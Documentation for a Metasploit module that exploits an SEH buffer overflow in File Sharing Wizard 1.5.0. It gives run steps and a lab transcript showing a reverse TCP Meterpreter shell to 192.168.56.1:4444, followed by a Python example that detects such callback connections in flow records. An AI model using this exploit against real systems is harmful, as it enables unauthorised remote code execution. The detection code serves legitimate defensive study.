## Description

This module exploits a vulnerability in File Sharing Wizard version 1.5.0 which allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter.

## Vulnerable Application

This module has been tested successfully on:

* Windows 7 x86 SP1

The application installer is linked below:

[File Sharing Wizard Installer](https://www.exploit-db.com/apps/da3a3626f99a85f9ab59ab77f083ff80-fs-wizard-setup.exe)

Once installed, run the application and click "Start" to enable the server.

## Verification Steps

1. Start `msfconsole`
2. Do: `use exploits/windows/http/file_sharing_wizard_seh`
3. Do: `set rhosts [IP]`
4. Do: `run`
5. Your payload should get executed

## Scenarios

```
msf5 > use exploit/windows/http/file_sharing_wizard_seh
msf5 exploit(windows/http/file_sharing_wizard_seh) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(windows/http/file_sharing_wizard_seh) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.101:80 - Connecting to target
[*] 192.168.56.101:80 - Sending payload to target
[*] Sending stage (180291 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49164) at 2019-10-03 23:09:18 +0100

meterpreter > sysinfo
Computer : TARGET
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter >
```
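In the transcript above, the host serving port 80 opens an outbound TCP connection (192.168.56.101:49164 -> 192.168.56.1:4444) right after receiving a request, which a file-sharing server has little reason to do. The following is an added example, not part of the module or its documentation, that flags this pattern in flow records. The record layout, the 5-second window, the `find_callbacks` name and the sample flows are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed flow records (not captured traffic): (time, src, sport, dst, dport).
# The third record mirrors the session line in the transcript; the rest are made up.
FLOWS = [
    ("2019-10-03 23:09:02", "192.168.56.20", 51544, "192.168.56.101", 80),
    ("2019-10-03 23:09:17", "192.168.56.1", 40212, "192.168.56.101", 80),
    ("2019-10-03 23:09:18", "192.168.56.101", 49164, "192.168.56.1", 4444),
    ("2019-10-03 23:30:00", "192.168.56.101", 49170, "192.168.56.53", 53),
]


def find_callbacks(flows, server_ip, server_port=80, window_s=5, allowed_dst=()):
    """Flag connections the server initiates shortly after an inbound request.

    Returns a list of ((src, sport, dst, dport), [inbound peer IPs]) where the
    outbound flow starts within window_s seconds after a request to server_port.
    allowed_dst is a collection of (ip, port) pairs the server may contact.
    """
    parsed = sorted(
        (datetime.strptime(t, FMT), s, sp, d, dp) for t, s, sp, d, dp in flows
    )
    window = timedelta(seconds=window_s)
    inbound = []  # (time, peer_ip) for every request seen so far
    alerts = []
    for ts, src, sport, dst, dport in parsed:
        if dst == server_ip and dport == server_port:
            inbound.append((ts, src))
        elif src == server_ip and (dst, dport) not in allowed_dst:
            # Peers whose request arrived at most window_s seconds earlier.
            peers = [ip for t, ip in inbound if timedelta(0) <= ts - t <= window]
            if peers:
                alerts.append(((src, sport, dst, dport), peers))
    return alerts


if __name__ == "__main__":
    for flow, peers in find_callbacks(FLOWS, "192.168.56.101"):
        print("outbound %s:%d -> %s:%d shortly after request from %s"
              % (*flow, ", ".join(peers)))
```

The outbound connection need not go back to the address that sent the request, so the function reports every recent inbound peer rather than matching on the destination.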